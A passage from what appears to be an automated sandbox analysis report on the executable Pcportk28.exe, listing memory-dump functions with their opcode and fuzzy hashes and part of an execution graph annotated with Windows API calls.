                                                Function 009E1438, Relevance: .1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7b0597fc4dfeb6999b2cec190f29c677f3ce32bfdb8764b0d43bd55a8d959c6
                                                • Instruction ID: 3a86e38e30d46748f05465990494237e6811d7f4a4b5243f9dfd26ea31892d50
                                                • Opcode Fuzzy Hash: a7b0597fc4dfeb6999b2cec190f29c677f3ce32bfdb8764b0d43bd55a8d959c6
                                                • Instruction Fuzzy Hash: 7A419B74E002688FCB65DF65CC887DDB7B2AB89305F1085EAD409AB395DB705E85CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0017D1D4, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485114296.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_17d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2e5168f7ca7254f22440c0c4d63e1348aed17fbd260f57d10ed84066775356c
                                                • Instruction ID: 26a7dd8497edb29fc52cc5d9d26fbe9e89193151b3f212dd40e872ee9bcf198c
                                                • Opcode Fuzzy Hash: a2e5168f7ca7254f22440c0c4d63e1348aed17fbd260f57d10ed84066775356c
                                                • Instruction Fuzzy Hash: 3121D071604208EFDB05DF14E980B26BBB5FF88318F24C5A9E9094B242C736D807CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0017D01C, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485114296.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_17d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1933f6b0c49f01d345463a2d5484c55273cbe67df6ac9811f4e4fc86cb36182
                                                • Instruction ID: d1dc86d654a551b8031f5adc251305e8acc357ae6dac6351f91096ee64911e92
                                                • Opcode Fuzzy Hash: a1933f6b0c49f01d345463a2d5484c55273cbe67df6ac9811f4e4fc86cb36182
                                                • Instruction Fuzzy Hash: CE21D075604248EFDB14DF24E984B26BB75EF88314F34C5A9E90D4B246C736D847CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E1B5A, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e77bdab59393620f5ec5a82197e83ea787c3172c2ba3d7d875a34b3c249861c
                                                • Instruction ID: 2b37b4cfdac6ac89c7fe6ecabf7d83c4c7ac23a4f960d4c6c4cd275e749151f1
                                                • Opcode Fuzzy Hash: 9e77bdab59393620f5ec5a82197e83ea787c3172c2ba3d7d875a34b3c249861c
                                                • Instruction Fuzzy Hash: 9D319A74A00268CFDB21DF65CC887DDB7B2AB89305F1085EAD409AB394DB755E85CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E1675, Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5672fdd65105f3299dfd6e5f29ecccbf0b60f09b9bc2b6990f182160154ab919
                                                • Instruction ID: 882ac955173b731b819812ce841a8f3ccc96967ab9413ca1fa85d07f3c15aeeb
                                                • Opcode Fuzzy Hash: 5672fdd65105f3299dfd6e5f29ecccbf0b60f09b9bc2b6990f182160154ab919
                                                • Instruction Fuzzy Hash: 3A318B70D00668CFDB65DF69C888BDDB7B5AB89305F1085E9D009AB291D7349E85CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0017D006, Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485114296.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_17d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9f5ddd475b2e5bf55c16974421a2f9a405ca4e1dcf75ea103203c9d10fa70e2
                                                • Instruction ID: fdcd420498e65962d79cf1409f43e11d6d84dbde1d0addc3af0b9fa0dcd4b571
                                                • Opcode Fuzzy Hash: f9f5ddd475b2e5bf55c16974421a2f9a405ca4e1dcf75ea103203c9d10fa70e2
                                                • Instruction Fuzzy Hash: AF218E755093848FCB12CF24D994715BF71EF46314F28C5EAD8498B2A7C33A980ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0017D1CF, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485114296.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_17d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9312aeadfc63cb20e3ad457e85a1559f4d8aca9a68f7bd39dcaec918bac959ea
                                                • Instruction ID: 53a8dff7c0a7756142630accde25a21d3c7d3b645a101e04c6fcffc88b3725b0
                                                • Opcode Fuzzy Hash: 9312aeadfc63cb20e3ad457e85a1559f4d8aca9a68f7bd39dcaec918bac959ea
                                                • Instruction Fuzzy Hash: DB118B75944284DFCB12CF14E5C4B15BFB1FF84314F28C6A9D8494B656C33AD84ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E1876, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6de1c2d46b08a72bc7a686e3fba4c3bb1be1f68215b24fb4a98b22c6846d7dac
                                                • Instruction ID: ba4415f474e53e694c9bd56756c68c2820b47ca262383af98736bf2783b8ff94
                                                • Opcode Fuzzy Hash: 6de1c2d46b08a72bc7a686e3fba4c3bb1be1f68215b24fb4a98b22c6846d7dac
                                                • Instruction Fuzzy Hash: 9D21CD70904228CFDB65DF64CC80BDDB7B5BB49305F5086E9D009AB291CB319E85DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E1BDA, Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1b6fa474b8f1ed9845dc824924fcda125ce00db39c8c97059ea0797c72ab3ab
                                                • Instruction ID: 15c1a367b899153f22656575ed33c9794e5dc62e23d46af9ec1011201581ab7f
                                                • Opcode Fuzzy Hash: f1b6fa474b8f1ed9845dc824924fcda125ce00db39c8c97059ea0797c72ab3ab
                                                • Instruction Fuzzy Hash: 0321D030800268CFDB25DF25D868BECB7B5AB5A301F1145E9D14EA72A1CB301EC4CF01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E17D1, Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 66bcf310cdb31fdd4349e144afdaf93806a469a6eb62cfbcc96c94febe546eff
                                                • Instruction ID: 65954ce19429f550dcf62bc92b618b313b5cb1c159b9307c9c38890738a44ea4
                                                • Opcode Fuzzy Hash: 66bcf310cdb31fdd4349e144afdaf93806a469a6eb62cfbcc96c94febe546eff
                                                • Instruction Fuzzy Hash: EB11BF359042688FCB25DF25D894BECB7B5AB5A301F1149E9D14EA72A1CB305ED4CF01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0016D1C1, Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485098504.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_16d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f15fad26ddd7db83bb1e5fcb6ace5bd6e8cc89e55dca28dd060a6ae9f1f42cf5
                                                • Instruction ID: f537fd7bbc7b7b7864fe2936f9094807c865bf03acf7fb335c5f8ef7461284f6
                                                • Opcode Fuzzy Hash: f15fad26ddd7db83bb1e5fcb6ace5bd6e8cc89e55dca28dd060a6ae9f1f42cf5
                                                • Instruction Fuzzy Hash: D901A731A087409AE7108A25EC84B67FFD8EF51764F29C45EEE085A283D779D851C6B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0016D1C0, Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485098504.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_16d000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3fb5d3033248aceb7460194f96b5f966d7fb75167a22103fa56b91d0f893844a
                                                • Instruction ID: cab09e942393e07020292f90b03013f9918b599f4fe510c1e631c14836ff0b5a
                                                • Opcode Fuzzy Hash: 3fb5d3033248aceb7460194f96b5f966d7fb75167a22103fa56b91d0f893844a
                                                • Instruction Fuzzy Hash: 4DF06271504644AAEB108A15ECC8B63FFD8EF51764F28C55AED085B287D379DC44CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E0C88, Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a2e20e5bdb9c2c29d8bdf691210d4c1eb13bfc938adfd276ba4a2de8d0eec6a
                                                • Instruction ID: f4cf7f9e0ac99c0b65e3af720c8d7779b12626555ce5c40ebd1b6ea6fafc6d59
                                                • Opcode Fuzzy Hash: 7a2e20e5bdb9c2c29d8bdf691210d4c1eb13bfc938adfd276ba4a2de8d0eec6a
                                                • Instruction Fuzzy Hash: 96F0E730D01249DFDB44EFA9D9446AEBBF9FB89305F2086A9C459E3260E7709A81DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E07A8, Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ef42d855840c241dafacc420e9c0ee42064e8956455730ebe5f495f613ac2e7
                                                • Instruction ID: 05b0af6e4a0b98f240dcf0ab8ca0e214c8db6dba9eb65c935a12089fcb1b03e9
                                                • Opcode Fuzzy Hash: 4ef42d855840c241dafacc420e9c0ee42064e8956455730ebe5f495f613ac2e7
                                                • Instruction Fuzzy Hash: FCF0F970D092489FCB45DBBA984439DBFB4AF85204F4484AAC448E3661E7749E86DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E2058, Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4359a09441708c2f82927301017815acfa09b620f9b4fcde9be7927d25f8fb08
                                                • Instruction ID: bbcc65eab83a3adf19e8bd8f14d74a5ac1cbece90e241dbe7996f9a694701ad2
                                                • Opcode Fuzzy Hash: 4359a09441708c2f82927301017815acfa09b620f9b4fcde9be7927d25f8fb08
                                                • Instruction Fuzzy Hash: BC01EC34900209EFCB45DFE9C940AAEBBF9FF48305F14C969E81993291D7719E91EB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E2048, Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c17db3ea8520d4a8b60c11476c0090b4ca5a941dd462ba16bf8db2dc8c891bab
                                                • Instruction ID: 3ad893fb3cbde891fed2dc950319a5a4e54738fb0b10608c74b45d26ce9ba0d4
                                                • Opcode Fuzzy Hash: c17db3ea8520d4a8b60c11476c0090b4ca5a941dd462ba16bf8db2dc8c891bab
                                                • Instruction Fuzzy Hash: E801A434509385AFCB13CFA4CC406987FB5EF4A311F1485DAE894872A2C3359D52EB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E0CF8, Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82a24c4f3e97705edc9ffa2a07f3d80cb96164ee5ff6f6cf288d3da73023f3a0
                                                • Instruction ID: 1699c9a1f03abfdbb3282514c839c2944b7a92cbc341850b5c3f15fecbea1146
                                                • Opcode Fuzzy Hash: 82a24c4f3e97705edc9ffa2a07f3d80cb96164ee5ff6f6cf288d3da73023f3a0
                                                • Instruction Fuzzy Hash: D4F03C70D052489FDB41DBEAD9446ADBFF4EF88300F1089AAC408A3252E3B459D0DB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E0C19, Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd4173c32ad508d5224dcfe21d8ec90c6de149c62c092dbf78530c9fd6a21edd
                                                • Instruction ID: 6ec3c6e2d2612ac36eb3f91d617bb607251dc918cb8033bea213831119a5655e
                                                • Opcode Fuzzy Hash: bd4173c32ad508d5224dcfe21d8ec90c6de149c62c092dbf78530c9fd6a21edd
                                                • Instruction Fuzzy Hash: CBF090309083859FC716CBB9D804699BFB4AF83315F2482D6C498931A2D7749DC1EB15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E1111, Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 539ed910ad81b62d703d598d8f26c07a350c04aa44d209f81847403faef1ecda
                                                • Instruction ID: ef60990b1aaed2ec4b39aef9049433f27b65c448d760f1d63bca370add54c737
                                                • Opcode Fuzzy Hash: 539ed910ad81b62d703d598d8f26c07a350c04aa44d209f81847403faef1ecda
                                                • Instruction Fuzzy Hash: 19F0BE309082858FC705DBA9D80879ABBF9BF42305F1482A9C51857262E7349D82EA55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E0C83, Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b36f08363a85af9c59f3ef76a70d8c962e3f9d5e9b04ace1813b88cd1bb5fab5
                                                • Instruction ID: f526bd2c19c856aabd13c4c11d4b90cc8a31bcfcb2fd9d9a3381efdaf1421808
                                                • Opcode Fuzzy Hash: b36f08363a85af9c59f3ef76a70d8c962e3f9d5e9b04ace1813b88cd1bb5fab5
                                                • Instruction Fuzzy Hash: F2F05E30D052498FCB04DFB4D8846EEBBB4FB8A300F204669C45AE3350E7704981DF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E2128, Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3101d5ebca12bef3a316bdba89604588f69c746120b00aea4802408d48036724
                                                • Instruction ID: fd3b2ec501ee2fe2f306068648c9ec96d55825ba260f8028fab9999ffb535c9d
                                                • Opcode Fuzzy Hash: 3101d5ebca12bef3a316bdba89604588f69c746120b00aea4802408d48036724
                                                • Instruction Fuzzy Hash: 02F0F430A042089FCB44DBA9C9416ADFBF8EB49305F1488AA881893351E7709E829B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E2117, Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08651c3dbdadc542c754078b26dba3c7e56e0b8a7dcd934f4ea0c35f97c78ef6
                                                • Instruction ID: 6839366e41feda84b39df8a40bab0efaf1bdc4434c21e5c8e0a666aa431620df
                                                • Opcode Fuzzy Hash: 08651c3dbdadc542c754078b26dba3c7e56e0b8a7dcd934f4ea0c35f97c78ef6
                                                • Instruction Fuzzy Hash: 53F0B470A0C3858FC712CBA4C890298BBF8AB47314F2845DEC49887292D3359E82C741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009E1598, Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.486038706.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9e0000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4dfba8e295964c36151396994e003d0be1aad966ae2b5561804a404bacb8d0d0
                                                • Instruction ID: eeba0d4647f7a25f81a2efe4a169165fbea8af577e786ab4793d8e39d9a548aa
                                                • Opcode Fuzzy Hash: 4dfba8e295964c36151396994e003d0be1aad966ae2b5561804a404bacb8d0d0
                                                • Instruction Fuzzy Hash: 1DF01575908218DFDB21CFA0DC84BDCBBB1BB08300F204599D109AB2A1CB341ED0DF04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00354968, Relevance: .2, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14d3505da3d5661de48f73eab17580ea50529337923c733f875cf58cdfa30d33
                                                • Instruction ID: 83e8eff27949a5169a6940ca9392cbf9c0c385c26050f94611a2581d3f795f93
                                                • Opcode Fuzzy Hash: 14d3505da3d5661de48f73eab17580ea50529337923c733f875cf58cdfa30d33
                                                • Instruction Fuzzy Hash: D1518C71D0C7858FCB1ACFB898509ABBFB4BB43305F1188ABC894D7152D3348989C762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00358990, Relevance: .2, Instructions: 151COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68aab40ee36258345bbe66d1f4506729ba5abc6b3177c1d785a59cf9b8db7086
                                                • Instruction ID: e7e9520f77cd80fdaf168f299bd5ec0e4c1986e50171c2f10eef046a48fc7c86
                                                • Opcode Fuzzy Hash: 68aab40ee36258345bbe66d1f4506729ba5abc6b3177c1d785a59cf9b8db7086
                                                • Instruction Fuzzy Hash: 0D513F709042098FD748DFBAE891B9EBBF2EFC8304F10D539D105AB664DB7059899B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00358980, Relevance: .1, Instructions: 149COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.485175415.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_350000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67dcf6bde0d95e3fd19369b69566994231f3b16a424c5a8fadc97c460e50295d
                                                • Instruction ID: d585f0b780c6edc6a160ef64c22a0457f4be6756a21d8265ccaa752a3a4ef03f
                                                • Opcode Fuzzy Hash: 67dcf6bde0d95e3fd19369b69566994231f3b16a424c5a8fadc97c460e50295d
                                                • Instruction Fuzzy Hash: 69516E709042498FD748DFBAE891B9E7BF2EFC8304F10C579D115AB668DB70598ACB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: Pcportk28.exe PID: 1964 Parent PID: 2124 Pcportk28.exeCOMMON

                                                Execution Graph

                                                Execution Coverage:2.3%
                                                Dynamic/Decrypted Code Coverage:2.4%
                                                Signature Coverage:5.9%
                                                Total number of Nodes:580
                                                Total number of Limit Nodes:72

                                                Graph

                                                execution_graph 61575 41d450 61578 419bf0 61575->61578 61579 419c16 61578->61579 61590 408b60 61579->61590 61581 419c22 61589 419c69 61581->61589 61598 40d170 61581->61598 61583 419c37 61586 419c4c 61583->61586 61646 418930 61583->61646 61610 40a610 61586->61610 61587 419c5b 61588 418930 2 API calls 61587->61588 61588->61589 61591 408b6d 61590->61591 61649 408ab0 61590->61649 61593 408b74 61591->61593 61661 408a50 61591->61661 61593->61581 61599 40d19c 61598->61599 62076 40a010 61599->62076 61601 40d1ae 62080 40d080 61601->62080 61604 40d1e1 61608 418710 2 API calls 61604->61608 61609 40d1f2 61604->61609 61605 40d1c9 61606 40d1d4 61605->61606 61607 418710 2 API calls 61605->61607 61606->61583 61607->61606 61608->61609 61609->61583 61611 40a635 61610->61611 61612 40a010 LdrLoadDll 61611->61612 61613 40a68c 61612->61613 62099 409c90 61613->62099 61615 40a6b2 61645 40a903 61615->61645 62108 4133a0 61615->62108 61617 40a6f7 61617->61645 62111 4079d0 61617->62111 61619 40a73b 61619->61645 62118 418780 61619->62118 61623 40a791 61624 40a798 61623->61624 62130 418290 61623->62130 61626 41a0a0 2 API calls 61624->61626 61628 40a7a5 61626->61628 61628->61587 61629 40a7e2 61630 41a0a0 2 API calls 61629->61630 61631 40a7e9 61630->61631 61631->61587 61632 40a7f2 61633 40d200 3 API calls 61632->61633 61634 40a866 61633->61634 61634->61624 61635 40a871 61634->61635 61636 41a0a0 2 API calls 61635->61636 61637 40a895 61636->61637 62135 4182e0 61637->62135 61640 418290 2 API calls 61641 40a8d0 61640->61641 61641->61645 62140 4180a0 61641->62140 61644 418930 2 API calls 61644->61645 61645->61587 61647 41894f ExitProcess 61646->61647 61648 4191e0 LdrLoadDll 61646->61648 61648->61647 61650 408ac3 61649->61650 61700 416e50 LdrLoadDll 61649->61700 61680 416d00 61650->61680 61653 408ad6 61653->61591 61654 408acc 61654->61653 61683 419530 61654->61683 61656 408b13 61656->61653 61694 4088d0 61656->61694 61658 408b33 61701 408320 LdrLoadDll 61658->61701 61660 408b45 61660->61591 61662 408a6a 61661->61662 61663 419820 LdrLoadDll 61661->61663 62050 419820 61662->62050 61663->61662 61666 419820 LdrLoadDll 61667 408a91 61666->61667 61668 40cf70 61667->61668 61669 40cf89 61668->61669 62058 409e90 61669->62058 61671 40cf9c 62062 418460 61671->62062 61675 40cfc2 61676 40cfed 61675->61676 62069 4184e0 61675->62069 61678 418710 2 API calls 61676->61678 61679 408b85 61678->61679 61679->61581 61702 418880 61680->61702 61684 419549 61683->61684 61715 413a50 61684->61715 61686 419561 61687 41956a 61686->61687 61754 419370 61686->61754 61687->61656 61689 41957e 61689->61687 61772 418180 61689->61772 62028 406e20 61694->62028 61696 4088ea 61697 4088f1 61696->61697 62041 4070e0 61696->62041 61697->61658 61700->61650 61701->61660 61703 416d15 61702->61703 61705 4191e0 61702->61705 61703->61654 61706 4191f0 61705->61706 61708 419212 61705->61708 61709 413e50 61706->61709 61708->61703 61711 413e6a 61709->61711 61713 413e5e 61709->61713 61711->61708 61712 413fbc 61712->61708 61713->61711 61714 4142d0 LdrLoadDll 61713->61714 61714->61712 61716 413d85 61715->61716 61718 413a64 61715->61718 61716->61686 61718->61716 61780 417ed0 61718->61780 61720 413b90 61783 4185e0 61720->61783 61721 413b73 61840 4186e0 LdrLoadDll 61721->61840 61724 413b7d 61724->61686 61725 413bb7 61726 41a0a0 2 API calls 61725->61726 61728 413bc3 61726->61728 61727 413d49 61730 418710 2 API calls 61727->61730 61728->61724 61728->61727 61729 413d5f 61728->61729 61734 413c52 61728->61734 61849 413790 LdrLoadDll NtReadFile NtClose 61729->61849 61731 413d50 61730->61731 61731->61686 61733 413d72 61733->61686 61735 413cb9 61734->61735 61737 413c61 61734->61737 61735->61727 61736 413ccc 61735->61736 61842 418560 61736->61842 61739 413c66 61737->61739 61740 413c7a 61737->61740 61841 413650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 61739->61841 61742 413c97 61740->61742 61743 413c7f 61740->61743 61742->61731 61798 413410 61742->61798 61786 4136f0 61743->61786 61745 413c70 61745->61686 61748 413d2c 61846 418710 61748->61846 61749 413c8d 61749->61686 61752 413caf 61752->61686 61753 413d38 61753->61686 61756 419381 61754->61756 61755 419393 61755->61689 61756->61755 61867 41a020 61756->61867 61758 4193b4 61870 413060 61758->61870 61760 419400 61760->61689 61761 4193d7 61761->61760 61762 413060 3 API calls 61761->61762 61765 4193f9 61762->61765 61764 41948a 61766 41949a 61764->61766 61996 419180 LdrLoadDll 61764->61996 61765->61760 61902 414390 61765->61902 61912 418ff0 61766->61912 61769 4194c8 61991 418140 61769->61991 61773 41819c 61772->61773 61774 4191e0 LdrLoadDll 61772->61774 62024 84fae8 LdrInitializeThunk 61773->62024 61774->61773 61775 4181b7 61777 41a0a0 61775->61777 61778 4195d9 61777->61778 62025 4188f0 61777->62025 61778->61656 61781 4191e0 LdrLoadDll 